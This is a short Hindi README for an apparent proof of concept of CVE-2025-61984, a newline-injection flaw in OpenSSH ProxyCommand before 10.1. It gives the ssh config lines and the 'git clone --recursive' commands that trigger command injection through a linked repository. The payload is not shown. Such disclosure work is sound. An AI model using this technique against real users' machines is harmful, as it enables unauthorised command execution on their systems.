
प्रूफ-ऑफ-कॉन्सेप्ट जो OpenSSH ProxyCommand (CVE-2025-61984) में न्यूलाइन इंजेक्शन भेद्यता प्रदर्शित करता है, जो क्राफ्टेड SSH कॉन्फ़िगरेशन के माध्यम से कमांड इंजेक्शन की अनुमति देता है।
यह एक प्रूफ ऑफ कॉन्सेप्ट है जो OpenSSH के <10.1 ProxyCommand को भ्रमित करने के लिए न्यूलाइन का उपयोग करता है। पूरा लेख।
एक .ssh/config सेट अप करें जिसमें निम्न शामिल हो:
Host *.example.com
ProxyCommand some-command %r@%h:%p
(कमांड मायने नहीं रखता, बस तर्कों में कहीं एक अनकोटेड %r होना चाहिए।)
फिर चलाएं (bash के लिए):
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc
या यदि $SHELL के रूप में fish का उपयोग कर रहे हैं:
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc
यदि आप शेल का उपयोग नहीं कर रहे हैं लेकिन इसका परीक्षण करना चाहते हैं, तो आप यह कर सकते हैं:
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc